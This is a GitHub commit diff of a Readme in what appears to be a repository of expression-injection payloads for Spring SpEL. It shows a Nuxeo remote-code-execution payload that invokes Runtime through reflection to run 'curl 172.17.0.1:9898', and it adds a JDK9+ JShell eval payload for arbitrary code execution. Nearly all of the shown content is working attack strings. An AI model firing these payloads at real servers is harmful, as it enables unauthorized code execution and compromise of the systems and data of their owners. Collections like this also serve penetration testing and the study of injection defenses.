Skip to content

Commit bca87f5

Browse files
authored
Update Readme.md
1 parent 914df00 commit bca87f5

1 file changed

Lines changed: 4 additions & 1 deletion

File tree

shell/SPEL/Readme.md

Lines changed: 4 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -83,7 +83,10 @@ T(java.nio.file.Files).write(T(java.nio.file.Paths).get(T(java.net.URI).create("
8383
Nuxeo RCE
8484
''['class'].forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(''['class'].forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),'curl 172.17.0.1:9898')
8585

86-
86+
87+
jdk9+
88+
89+
T(jdk.jshell.JShell).Methods[6].invoke(null,'').eval('xxxx');
8790
```
8891

8992
字符串绕过

0 commit comments

Comments
 (0)